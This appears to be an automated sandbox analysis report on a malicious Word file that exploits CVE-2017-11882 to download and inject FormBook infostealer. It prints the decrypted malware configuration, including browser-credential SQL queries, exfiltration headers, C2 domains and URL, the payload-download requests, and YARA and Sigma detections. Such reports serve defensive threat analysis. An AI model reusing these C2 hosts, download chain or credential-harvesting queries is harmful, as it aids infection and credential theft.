Loading ...

Play interactive tourEdit tour

Analysis Report IMG-50230.doc

Overview

General Information

Sample Name:IMG-50230.doc
Analysis ID:344787
MD5:447225e0d19daba3ebaa394a72b72318
SHA1:ade2804cac4b052d9fb2af635dd2b7e4dd960853
SHA256:39e2a7aebe3542b3caf9fca72de467f409766056a29923042ec91c5140503409
Tags:doc

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AntiVM_3
Yara detected FormBook
Allocates memory in foreign processes
Connects to a URL shortener service
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2112 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2232 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • 69577.exe (PID: 2536 cmdline: C:\Users\Public\69577.exe MD5: BEB09E991A41577E79DFABC58178A44F)
      • AddInProcess32.exe (PID: 2688 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: DA55A7AED2F65D6104E1A79EE067CC00)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • rundll32.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • cmd.exe (PID: 1980 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc6", "KEY1_OFFSET 0x1d737", "CONFIG SIZE : 0x103", "CONFIG OFFSET 0x1d83b", "URL SIZE : 35", "searching string pattern", "strings_offset 0x1c383", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x964e9058", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715032", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012162", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014d5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "motherdairysfranchise.com", "realhomeincest.com", "unclebal.info", "1039995.com", "getdiscoveryplus.com", "beingsupermommy.com", "frfcentre.com", "shelterislandbeachwear.com", "rangers3.xyz", "hotlinebus.com", "lojailymodas.com", "profille-edwena67marilynn.club", "owe.pink", "sorenohotel.com", "keller-minimal-windows.com", "lujanlimo.com", "whitefeathercleaning.com", "superpay.info", "elmtreecottage.com", "shmoop.club", "shortflagsuniverse.com", "xingfulujing.com", "promotwins.com", "ae993.com", "kevinhammer.net", "protivafiber.com", "ahmetcanhoca.com", "economist.sucks", "fokusummat.com", "visitkaaba.com", "minilemons.com", "vaginalcosmetic.com", "healthmeetsyou.com", "khanhvps.design", "nekotsuki.net", "gloryexperiencemedia.com", "matutinao.com", "storytool256.com", "luhhulie.com", "vnhayrxu.icu", "ministerioriosdegloria.com", "whistleblowernewsnetwork.net", "african-sound.com", "quilometrezero.online", "febird.info", "sellkenoshacounty.com", "saiparahnama.com", "healthynailz.com", "foundershuddle.com", "bycaqar.com", "purpleandpinkstore.com", "forbiddenfeet.com", "saplingsenglishmediumschool.com", "bakebakeys.com", "xn--th-xma.com", "belovedllc.com", "rlgfactory.com", "wearablefantasy.com", "hxlw55.com", "bew67zp4f4ty5.net", "lateliersignature.com", "laok520.com", "hemitea.com", "treasurecoastmortgages.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.wirelesschargerkings.com/zrmt/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x88e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x957a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a507:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x17429:$sqlite3step: 68 34 1C 7B E1
    • 0x1753c:$sqlite3step: 68 34 1C 7B E1
    • 0x17458:$sqlite3text: 68 38 2A 90 C5
    • 0x1757d:$sqlite3text: 68 38 2A 90 C5
    • 0x1746b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17593:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 14 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.AddInProcess32.exe.80000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.AddInProcess32.exe.80000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.AddInProcess32.exe.80000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17629:$sqlite3step: 68 34 1C 7B E1
        • 0x1773c:$sqlite3step: 68 34 1C 7B E1
        • 0x17658:$sqlite3text: 68 38 2A 90 C5
        • 0x1777d:$sqlite3text: 68 38 2A 90 C5
        • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17793:$sqlite3blob: 68 53 D8 7F 8C

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2232, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2536
        Sigma detected: EQNEDT32.EXE connecting to internetShow sources
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 67.199.248.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2232, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2232, TargetFilename: C:\Users\Public\69577.exe
        Sigma detected: Executables Started in Suspicious FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2232, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2536
        Sigma detected: Execution in Non-Executable FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2232, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2536
        Sigma detected: Suspicious Program Location Process StartsShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2232, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2536

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 5.2.AddInProcess32.exe.80000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc6", "KEY1_OFFSET 0x1d737", "CONFIG SIZE : 0x103", "CONFIG OFFSET 0x1d83b", "URL SIZE : 35", "searching string pattern", "strings_offset 0x1c383", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x964e9058", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715032", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012162", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014d5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04"
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-50230[1].pdfJoe Sandbox ML: detected
        Source: C:\Users\Public\69577.exeJoe Sandbox ML: detected
        Source: 5.2.AddInProcess32.exe.80000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

        Compliance:

        barindex
        Uses new MSVCR DllsShow sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Binary contains paths to debug symbolsShow sources
        Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe
        Source: Binary string: wntdll.pdb source: AddInProcess32.exe, rundll32.exe
        Source: Binary string: rundll32.pdb source: AddInProcess32.exe, 00000005.00000002.2140415734.00000000001C4000.00000004.00000020.sdmp
        Source: C:\Users\Public\69577.exeCode function: 4x nop then jmp 003AAFE3h
        Source: C:\Users\Public\69577.exeCode function: 4x nop then mov esp, ebp
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi
        Source: global trafficDNS query: name: bit.ly
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 67.199.248.11:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 67.199.248.11:80

        Networking:

        barindex
        Connects to a URL shortener serviceShow sources
        Source: unknownDNS query: name: bit.ly
        Source: unknownDNS query: name: bit.ly
        Source: Joe Sandbox ViewIP Address: 67.199.248.11 67.199.248.11
        Source: Joe Sandbox ViewASN Name: GOOGLE-PRIVATE-CLOUDUS GOOGLE-PRIVATE-CLOUDUS
        Source: global trafficHTTP traffic detected: GET /3iWebUT HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /3iWebUT HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cgi./IMG-50230.pdf HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: neuromedic.com.br
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{248D4A90-30CA-4646-ACFF-79FC9E14ADCB}.tmpJump to behavior
        Source: global trafficHTTP traffic detected: GET /3iWebUT HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /3iWebUT HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cgi./IMG-50230.pdf HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: neuromedic.com.br
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
